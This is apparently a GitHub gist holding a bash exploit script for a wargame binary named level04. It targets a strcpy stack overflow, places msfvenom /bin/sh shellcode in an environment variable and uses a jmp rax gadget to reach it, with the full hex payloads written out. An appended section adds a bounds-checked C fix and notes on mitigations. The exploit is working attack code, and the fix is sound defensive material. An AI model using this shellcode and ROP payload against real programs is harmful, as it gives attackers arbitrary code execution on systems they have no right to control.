@safiire
Created January 9, 2019 20:04
Buffer overflow from a small amount of space, with some ROP and env shellcode
#!/bin/bash
# ASLR is on (stack, libs, vdso, etc)
# execstack is on
# .text segment is static, no PIE
#
# #include <string.h>
#
# int dobug(char *arg) {
#     char buf[8];
#     strcpy(buf, arg);
# }
#
# int main(int argc, char *argv[]) {
#     return dobug(argv[1]);
# }
#
# Control flow: <dobug> -> <jmp rax gadget> -> <stage1: buffer with jmp rsi> -> <env: AA=[stage2: /bin/sh shellcode]>
cd /levels
# Unset everything in the environment
unset `env | awk -F= '/^\w/ {print $1}' | xargs`
# Set second stage /bin/sh shellcode into the only env var, this is located at rsi
# msfvenom -b '\x00' -p linux/x64/exec CMD=/bin/sh -f c
export AA=`printf "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x6f\x2d\xf1\x3a\x65\x82\xf8\xa9\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x05\x16\xa9\xa3\x2d\x39\xd7\xcb\x06\x43\xde\x49\x0d\x82\xab\xe1\xe6\xca\x99\x17\x06\x82\xf8\xe1\xe6\xcb\xa3\xd2\x6d\x82\xf8\xa9\x40\x4f\x98\x54\x4a\xf1\x90\xa9\x39\x7a\xb9\xb3\x83\x8d\xfd\xa9"`
# Exploit the program: send the first-stage shellcode into the tiny buffer available.
# rax still points to buf because strcpy returns its destination and dobug never overwrites rax afterwards.
# Payload layout: <jmp rsi> <padding up to the saved return address> <0x60043c, the jmp rax gadget>
./level04 `printf "\xff\xe6\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x3c\x04\x60"`
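As an added example that is not part of the gist, here is the dobug() from the header beside a bounded version (the names copy_bounded, dobug_fixed and roundtrip_ok are mine): the fixed version rejects any argument that does not fit the 8-byte buffer, so the overwrite of the saved return address that the chain above relies on cannot occur.

```c
#include <string.h>

/* The page's dobug(): strcpy() into an 8-byte stack buffer with no bound,
 * so an argument of 8 bytes or more runs off the end of buf into the saved
 * frame. Kept only for comparison; nothing here calls it. */
int dobug_vulnerable(char *arg) {
    char buf[8];
    strcpy(buf, arg);
    return 0;
}

/* Bounded copy: returns 0 if arg plus its NUL fits in dst_len bytes and was
 * copied, -1 otherwise. Never writes past dst and never reads more than
 * dst_len bytes of arg. An oversized argument is rejected, not truncated:
 * silent truncation is its own class of bug. */
int copy_bounded(char *dst, size_t dst_len, const char *arg) {
    size_t n = 0;
    if (dst_len == 0)
        return -1;
    while (n < dst_len && arg[n] != '\0')
        n++;
    if (n == dst_len)          /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, arg, n + 1);   /* n bytes plus the NUL */
    return 0;
}

/* Fixed dobug(): same 8-byte buffer, but the copy is checked and the
 * function reports the rejection instead of corrupting its frame. */
int dobug_fixed(const char *arg) {
    char buf[8];
    if (copy_bounded(buf, sizeof buf, arg) != 0)
        return -1;
    return 0;
}

/* Check helper: copies s into an 8-byte buffer and reports whether the copy
 * was accepted and matches s byte for byte. */
int roundtrip_ok(const char *s) {
    char buf[8];
    return copy_bounded(buf, sizeof buf, s) == 0 && strcmp(buf, s) == 0;
}
```

Building with `-z noexecstack` and as a PIE also removes the two properties the header lists (executable stack, fixed .text address), but those are mitigations; the length check is the fix.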